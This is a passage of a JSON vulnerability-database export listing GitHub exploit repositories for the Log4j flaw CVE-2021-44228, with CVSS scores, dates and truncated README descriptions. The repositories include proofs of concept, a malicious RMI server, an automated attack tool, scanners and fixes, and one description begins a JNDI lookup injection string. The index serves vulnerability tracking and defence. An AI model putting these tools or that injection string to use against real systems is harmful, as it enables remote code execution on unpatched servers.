"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-20T16:41:33", "id": "94966928-86D4-5285-9A57-CBDD8F2EF438", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-17T15:41:48", "description": "# jndiRep - CVE-2021-44228\nBasically a **bad** grep on even **wo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:25:08", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-24T11:13:49", "id": "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:28:30", "description": "# evil-rmi-server\nAn evil RMI server that can launch an arbitrar...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T16:49:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:39", "id": "22AAF71B-053F-5E71-9F26-039C48FCCD62", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:19:41", "description": "# CVE-2021-44228-log4jVulnScanner-metasploit\nopen detection and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T01:59:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:54", "id": "BA8F1657-CF64-574C-81BA-6432D5A351D4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-27T08:07:19", "description": "# Log4j_Attacker_IPList\nCVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T06:29:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T06:34:21", "id": "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:52", "description": "# CVE-2021-44228-POC\nYet another CVE-2021-44228 POC\n\nAffected Lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T17:42:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T19:25:27", "id": "DBBD6963-3870-5117-A829-3DE976AE90E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:13", "description": "# CVE-2021-44228 in Minecraft\n- Java 16\n- Paper server build #39...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T11:22:51", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T06:41:00", "id": "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T03:11:13", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T17:32:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T10:05:33", "id": "3549B000-260E-5A24-9573-935F898D149C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:30:52", "description": "# CVE-2021-44228-Log4Shell-Hashes\nHashes for vulnerable LOG4J ve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T18:06:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:34", "id": "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:16", "description": "# CVE-2021-44228-quickfix-script\nUse environment variable to dis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T04:17:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:19:16", "id": "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-12T05:28:20", "description": "# Log4Shell\n\nThis repository is for Log4j 2021 (CVE-2021-44228) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-12T03:02:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-12T03:02:24", "id": "E4491698-477C-599A-A65D-EBA7441764E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T00:13:43", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T02:29:34", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T18:17:10", "id": "958F00F1-C4FC-5213-82EA-290A530F859B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:05", "description": "# Get-log4j-Windows.ps1\n \n Identify all log4j components across...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T10:49:36", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T12:25:17", "id": "F208D311-79CA-5A2C-AE81-591BA4D30750", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T11:04:14", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T08:20:07", "id": "5CEF4882-D1D5-5861-944F-34E8868BF986", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-15T23:09:22", "description": "# CVE-2021-44228 (Apache Log4j Remote Code Execution\uff09\n\n> [all lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T08:46:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-15T12:50:57", "id": "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-04-26T18:07:03", "description": "# CVE-2021-44228-ScannersListFromRF\n\nIn light with a huge amount...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T10:34:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-09T08:14:37", "id": "9D8C431A-57F3-560C-8146-1232C2C029C2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-11T02:07:56", "description": "# CVE-2021-44228-test\n\nwysylasz `${jndi:ldap:...", "cvss3": {}, "published": "2021-12-10T15:39:09", "type": "githubexploit", "title": "Exploit for CVE-2021-44228", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:43:39", "id": "780AD920-FF08-55C6-84C8-A8536C6F5527", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:26", "description": "# Log4Shell Honeypot\n\nThis demo application is vulnerable to the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:32:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-03T03:58:01", "id": "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:18", "description": "# Log4j 2 CVE-2021-44228 \u6d4b\u8bd5\u6837\u672c\u5e94\u7528\n\n\u57fa\u4e8e spring-boot-starter-log4j2:2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T15:18:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T06:42:48", "id": "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:15", "description": "# log4fix\nThis tool is to detect and fix the log4j log4shell vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T11:54:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-22T23:48:42", "id": "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T00:58:41", "description": "# LogMePwn\nLogMePwn is a fully automated, multi-protocol, reliab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T06:37:59", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:42", "id": 